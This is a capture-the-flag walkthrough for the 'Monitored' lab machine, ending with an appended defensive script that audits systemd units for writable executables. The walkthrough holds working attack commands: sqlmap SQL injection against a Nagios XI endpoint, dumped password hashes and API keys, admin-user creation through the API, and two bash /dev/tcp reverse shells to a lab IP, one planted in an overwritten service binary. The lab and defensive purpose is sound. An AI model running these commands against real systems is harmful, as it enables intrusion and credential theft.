Open ports: 22, 80, 389, 443, 5667
Hosts: monitored.htb, nagios.monitored.htb
Found on port 443 with gobuster:
https://nagios.monitored.htb/nagiosxi/terminal/
https://nagios.monitored.htb/nagiosxi/login.php
From the UDP scan:
sudo nmap -sU -sC -sV -T4 --min-rate=500 monitored.htb -p161,162
Found credentials via SNMP (in the nmap scan result for port 161):
svc:XjH7VCehowpR1xZB
The credentials are not valid on the login page found in the previous stage.
Let's see if there is any other login page.
try
with creds, then we get
Googling for an exploit leads to this endpoint:
https://nagios.monitored.htb/nagiosxi/admin/banner_message-ajaxhelper.php
Get the auth token with a POST request via curl, then try sqlmap:
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch --dbs
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi --tables
sqlmap -u "https://nagios.monitored.htb//nagiosxi/admin/banner_message-ajaxhelper.php?action=acknowledge_banner_message&id=3&token=`curl -ks https://nagios.monitored.htb/nagiosxi/api/v1/authenticate -d "username=svc&password=XjH7VCehowpR1xZB&valid_min=500" | awk -F'"' '{print$12}'`" --level 5 --risk 3 -p id --batch -D nagiosxi -T xi_users --dump
Database: nagiosxi
Table: xi_users
[2 entries]
+---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| user_id | name                 | email               | api_key                                                          | enabled | password                                                     | username    | created_by | last_login | api_enabled | last_edited | created_time | last_attempt | backend_ticket                                                   | last_edited_by | login_attempts | last_password_change |
+---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
| 1       | Nagios Administrator | admin@monitored.htb | IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL | 1       | $2a$10$825c1eec29c150b118fe7unSfxq80cf7tHwC0J0BG2qZiNzWRUx2C | nagiosadmin | 0          | 1701931372 | 1           | 1701427555  | 0            | 0            | IoAaeXNLvtDkH5PaGqV2XZ3vMZJLMDR0                                 | 5              | 0              | 1701427555           |
| 2       | svc                  | svc@monitored.htb   | 2huuT2u2QIPqFuJHnkPEEuibGJaJIcHCFDpDb29qSFVlbdO4HJkjfg2VpDNE3PEK | 0       | $2a$10$12edac88347093fcfd392Oun0w66aoRVCrKMPBydaUfgsgAOUHSbK | svc         | 1          | 1699724476 | 1           | 1699728200  | 1699634403   | 1705298638   | 6oWBPbarHY4vejimmu3K8tpZBNrdHpDgdUEs5P2PFZYpXSuIdrRMYgk66A0cjNjq | 1              | 6              | 1699697433           |
+---------+----------------------+---------------------+------------------------------------------------------------------+---------+--------------------------------------------------------------+-------------+------------+------------+-------------+-------------+--------------+--------------+------------------------------------------------------------------+----------------+----------------+----------------------+
Add a new user by using admin’s api_key
IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL
curl -k "https://nagios.monitored.htb/nagiosxi/api/v1/system/user?apikey=IudGPHd9pEKiee9MkJ7ggPD89q3YndctnPeRQOmS2PQ7QIrbJEomFVG6Eut9CHLL&pretty=1" -d "username=ivan&password=123456&name=ivan&email=ivan@gmail.com&auth_level=admin"
We now have ivan:123456. After logging in, a password change is required; changed to 123123.
Add a check command here and set it to a reverse shell, then apply the configuration:
bash -c 'bash -i >& /dev/tcp/10.10.14.10/6666 0>&1'
Go to Hosts to activate it.
We get the user shell.
sudo -l
User nagios may run the following commands on localhost:
    (root) NOPASSWD: /etc/init.d/nagios start
    (root) NOPASSWD: /etc/init.d/nagios stop
    (root) NOPASSWD: /etc/init.d/nagios restart
    (root) NOPASSWD: /etc/init.d/nagios reload
    (root) NOPASSWD: /etc/init.d/nagios status
    (root) NOPASSWD: /etc/init.d/nagios checkconfig
    (root) NOPASSWD: /etc/init.d/npcd start
    (root) NOPASSWD: /etc/init.d/npcd stop
    (root) NOPASSWD: /etc/init.d/npcd restart
    (root) NOPASSWD: /etc/init.d/npcd reload
    (root) NOPASSWD: /etc/init.d/npcd status
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/components/autodiscover_new.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/send_to_nls.php *
    (root) NOPASSWD: /usr/bin/php /usr/local/nagiosxi/scripts/migrate/migrate.php *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/components/getprofile.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/upgrade_to_latest.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/change_timezone.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_services.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/reset_config_perms.sh
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/manage_ssl_config.sh *
    (root) NOPASSWD: /usr/local/nagiosxi/scripts/backup_xi.sh *
The shell is unstable. We upload an SSH public key to get a more stable shell.
Generate a key pair:
ssh-keygen -t rsa -b 4096
echo "ssh-rsa <public key>" > ~/.ssh/authorized_keys
Then upload the public key:
mkdir ~/.ssh
vi ~/.ssh/authorized_keys
ssh -i ~/.ssh/id_rsa nagios@monitored.htb
Then connect over SSH.
Run linpeas.sh:
/etc/systemd/system/multi-user.target.wants/mariadb.service could be executing some relative path
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
/etc/systemd/system/multi-user.target.wants/nagios.service is calling this writable executable: /usr/local/nagios/bin/nagios
/etc/systemd/system/multi-user.target.wants/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd
/etc/systemd/system/npcd.service is calling this writable executable: /usr/local/nagios/bin/npcd
vi /usr/local/nagios/bin/npcd
sudo /usr/local/nagiosxi/scripts/manage_services.sh stop npcd
vi /usr/local/nagios/bin/npcd
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.10/4444 0>&1
sudo /usr/local/nagiosxi/scripts/manage_services.sh start npcd
We get a root shell.
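A defender's check for the linpeas finding above (a service executable that a non-root account can overwrite, combined with a sudo rule that restarts the service), added here as an example and not part of the original notes. It assumes GNU stat; `unit_execs`, `is_unsafe`, `audit_units` and `demo` are hypothetical helper names, and the fixture files are constructed:

```shell
#!/usr/bin/env bash
# Added example (not from the original notes): audit systemd units for
# executables a non-root account could overwrite, as with npcd above.
# Assumes GNU stat; every path used by demo() is constructed in a temp dir.

# Print the executable named by each Exec*= line of unit file $1.
unit_execs() {
    # Drop the key and systemd's prefix characters (-, @, :, +, !); keep word 1.
    sed -n 's/^Exec[A-Za-z]*=[-@:+!]*\([^[:space:]]*\).*/\1/p' "$1"
}

# Succeed if file $1 is not owned by uid $2 (default 0, root) or is
# group- or world-writable.
is_unsafe() {
    info=$(stat -c '%u %a' -- "$1" 2>/dev/null) || return 1
    owner=${info% *}; mode=${info#* }
    [ "$owner" != "${2:-0}" ] && return 0
    [ $(( 0$mode & 022 )) -ne 0 ]   # 022 = group-write | other-write
}

# Print "unit: path" for each unsafe executable referenced in directory $1.
audit_units() {
    for unit in "$1"/*.service; do
        [ -f "$unit" ] || continue
        for exe in $(unit_execs "$unit"); do
            if is_unsafe "$exe" "${2:-0}"; then echo "${unit##*/}: $exe"; fi
        done
    done
}

# Constructed fixture: npcd is group-writable (flagged), sshd is not.
demo() {
    root=$(mktemp -d) || return 1
    mkdir -p "$root/units" "$root/bin"
    printf '#!/bin/sh\n' > "$root/bin/npcd"; chmod 0775 "$root/bin/npcd"
    printf '#!/bin/sh\n' > "$root/bin/sshd"; chmod 0755 "$root/bin/sshd"
    printf '[Service]\nExecStart=%s -d -f /etc/npcd.cfg\n' "$root/bin/npcd" \
        > "$root/units/npcd.service"
    printf '[Service]\nExecStart=-%s -D\n' "$root/bin/sshd" \
        > "$root/units/ssh.service"
    # The fixture belongs to the current user, so that uid is the trusted owner.
    audit_units "$root/units" "$(id -u)"
    rm -rf "$root"
}

demo
```

On a real host, run `audit_units /etc/systemd/system` with the default trusted uid of 0; any executable it prints should be owned by root with mode 0755 before a sudo rule is allowed to start or restart its service.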